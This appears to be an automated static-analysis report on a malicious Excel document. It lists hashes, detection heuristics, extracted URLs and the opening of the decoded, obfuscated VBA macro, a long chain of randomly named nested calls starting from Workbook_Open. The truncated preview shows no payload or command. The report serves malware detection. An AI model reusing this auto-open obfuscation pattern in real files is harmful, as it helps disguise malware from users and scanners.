Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c5b9c3a3bbfa89c8…

MALICIOUS

Office (OLE)

469.5 KB Created: 2017-07-31 21:33:49 Authoring application: Microsoft Excel First seen: 2018-09-04
MD5: 703ac195bbe7e93a41f172168be94011 SHA-1: 27c0f93d1a25e6ae12b60724c23fa51ebd55cbdf SHA-256: c5b9c3a3bbfa89c83e1fb3955492044fd8bf61f7061ce1a0722a393e974cec7c
210 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file is an Excel document containing a Workbook_Open VBA macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary commands, commonly used to download and run additional malicious payloads. The ClamAV detection name 'Xls.Malware.Valyria-10036514-0' further supports its malicious nature. The macro's obfuscated nature and the presence of the Shell() call strongly suggest a downloader or dropper functionality.

Heuristics 7

  • ClamAV: Xls.Malware.Valyria-10036514-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-10036514-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Callback phishing phone lure medium SE_CALLBACK_LURE
    Document asks the user to call a phone number in billing, refund, subscription, fraud, or security context — consistent with callback phishing or tech-support scam patterns. Suppressed for legitimate-issuer (IRS/gov/official-form) documents that carry no urgency or charge/dispute escalation.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.edefter.gov.tr In document text (OLE body)
    • http://www.xbrl.org/int/gl/bus/2006-10-25In document text (OLE body)
    • http://www.xbrl.org/int/gl/cor/2006-10-25In document text (OLE body)
    • http://www.xbrl.org/int/gl/muc/2006-10-25In document text (OLE body)
    • http://www.xbrl.org/int/gl/plt/2006-10-25In document text (OLE body)
    • http://www.xbrl.org/2003/iso4217In document text (OLE body)
    • http://www.xbrl.org/2005/iso639In document text (OLE body)
    • http://www.xbrl.org/2003/linkbaseIn document text (OLE body)
    • http://www.xbrl.org/2003/instanceIn document text (OLE body)
    • http://www.gib.gov.trIn document text (OLE body)
    • http://www.ortadogusondaj.comIn document text (OLE body)
    • http://www.w3.org/2000/09/xmldsig#In document text (OLE body)
    • http://uri.etsi.org/01903/v1.3.2#In document text (OLE body)
    • http://www.w3.org/2001/XMLSchema-instanceIn document text (OLE body)
    • http://www.w3.org/1999/xlinkIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 111652 bytes
SHA-256: 58be2706cd19ffe711673aface151069d2919e8615bc27fcd67150a93fe2f4bc
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Worksheet"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Worksheets"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub WORKBOoK_OPeN(): Call BxXRyBtUEullqxI: End Sub
Static Function BxXRyBtUEullqxI() As Long
Call YWLZgeFDdMFbImw
End Function
Function YWLZgeFDdMFbImw() As Double
Call YbLqaeqCChBbWFv
End Function
Private Function YbLqaeqCChBbWFv() As Currency
Call xsiMYFgWvzgqxbT
End Function
Static Function xsiMYFgWvzgqxbT() As Long
Call MLaGLqStUSrTNsK
End Function
Static Sub MLaGLqStUSrTNsK()
Call lUhqXRnzimiHxuS
End Sub
Function lUhqXRnzimiHxuS() As Boolean
Call CeJxYADIbGFIWst
End Function
Private Sub CeJxYADIbGFIWst()
Call WRsQuUeetVAMayH
End Sub
Static Sub WRsQuUeetVAMayH()
Call oUDlKDYYHqimJcS
End Sub
Static Sub oUDlKDYYHqimJcS()
Call eimMeNZoqKzbEJB
End Sub
Private Sub eimMeNZoqKzbEJB()
Call LyqKnfVGEdxdpkF
End Sub
Private Function LyqKnfVGEdxdpkF() As Double
Call CFJyWoAHJxartyY
End Function
Private Function CFJyWoAHJxartyY() As String
Call lNwKtGaLsSjSmGM
End Function
Sub lNwKtGaLsSjSmGM()
Call rgIcVzHkwkcHtRX
End Sub
Private Sub rgIcVzHkwkcHtRX()
Call pCoRlCiMeCBKpXD
End Sub
Private Function pCoRlCiMeCBKpXD() As Variant
Call xNjxbutXDWFYFOz
End Function
Static Sub xNjxbutXDWFYFOz()
Call wbzAHvzkHpqAKBO
End Sub
Function wbzAHvzkHpqAKBO() As Date
Call FeesMmohBKFniZt
End Function
Private Function FeesMmohBKFniZt() As Object
Call TFmZjYwSEcGrqJB
End Function
Private Function TFmZjYwSEcGrqJB() As Date
Call dBBfDOPATygDXOQ
End Function
Private Function dBBfDOPATygDXOQ() As Byte
Call tTtZqyBXsRrfofI
End Function
Sub tTtZqyBXsRrfofI()
Call SdAJCZWdGliUXhP
End Sub
Private Function SdAJCZWdGliUXhP() As Integer
Call jnbQEImmAFFVxer
End Function
Private Sub jnbQEImmAFFVxer()
Call XJbdJTIQOWLljfq
End Sub
Sub XJbdJTIQOWLljfq()
Call wZGZEtiAOQgfSoR
End Sub
Sub wZGZEtiAOQgfSoR()
Call mopzYDjPxjxTNVB
End Sub
Static Function mopzYDjPxjxTNVB() As Boolean
Call TDtyhWfhLCwVyxE
End Function
Static Sub TDtyhWfhLCwVyxE()
Call YfVCtQhVuTdmvbg
End Sub
Static Function YfVCtQhVuTdmvbg() As Double
Call HnIORiHZdnnNpjU
End Function
Function HnIORiHZdnnNpjU() As Integer
Call zmLQPqRMCJaACdX
End Function
Static Function zmLQPqRMCJaACdX() As Single
Call xHrFfssnlbACyjC
End Function
Static Function xHrFfssnlbACyjC() As Long
Call FTmlVkDyKvDROby
End Function
Sub FTmlVkDyKvDROby()
Call DgCoAlJMOOosTNN
End Sub
Private Function DgCoAlJMOOosTNN() As Object
Call aFqwjOWumgIilCB
End Function
Static Function aFqwjOWumgIilCB()
Call bKpNdOGtLBEjzVB
End Function
Private Function bKpNdOGtLBEjzVB() As Object
Call zbNjbqwOEUjyarY
End Function
Static Sub zbNjbqwOEUjyarY()
Call AYwNkpLzyqqYxrH
End Sub
Private Sub AYwNkpLzyqqYxrH()
Call oDMNaBDrrGlPaLX
End Sub
Static Sub oDMNaBDrrGlPaLX()
Call lahtmJcecHvKzRE
End Sub
Function lahtmJcecHvKzRE() As Currency
Call MbYqOjbWMcwXrAv
End Function
Private Function MbYqOjbWMcwXrAv() As Object
Call szsbIDtCFujATvP
End Function
Private Sub szsbIDtCFujATvP()
Call iOcCcNuSoNApOcy
End Sub
Static Sub iOcCcNuSoNApOcy()
Call PdfAlgqkCgzrzDC
End Sub
Function PdfAlgqkCgzrzDC() As String
Call GkzoToVmGBbEDRV
End Function
Function GkzoToVmGBbEDRV()
Call osmArGvppVlfxZJ
End Function
Private Sub osmArGvppVlfxZJ()
Call vMySSzbPtndVEkU
End Sub
Static Sub vMySSzbPtndVEkU()
Call fMVrFQgExJyVGZs
End Sub
Function fMVrFQgExJyVGZs()
Call AtZnZuOBBZGmPhv
End Function
Private Sub AtZnZuOBBZGmPhv()
Call zGpqEvUOFtrOVUL
End Sub
Static Function zGpqEvUOFtrOVUL() As Byte
Call IKUiJmJLyOGBtsq
End Fu
... (truncated)